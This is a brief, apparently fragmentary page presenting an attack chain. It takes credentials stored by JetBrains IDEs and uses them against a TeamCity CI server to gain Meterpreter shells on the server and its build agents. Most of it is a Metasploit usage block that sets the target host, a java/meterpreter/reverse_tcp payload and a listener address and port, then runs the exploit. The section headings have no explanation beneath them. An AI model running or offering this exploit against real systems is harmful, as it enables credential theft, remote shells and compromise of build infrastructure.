- Obtain passwords from JetBrains IDE (like IntelliJ or PyCharm) and use those credentials inside TeamCity Continuous Integration Server in order to get meterpreter session on server and build agents using metasploit.
How JetBrains IDE store passwords?
Metasploit module demo:
Basic usage:
use exploit/teamcity
set RHOST 192.168.1.1
set RPORT 8111
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.1.118
set LPORT 4444
set USERNAME your_user_name
set PASSWORD your_password
exploit
Timeline
- 11-02-2018: Release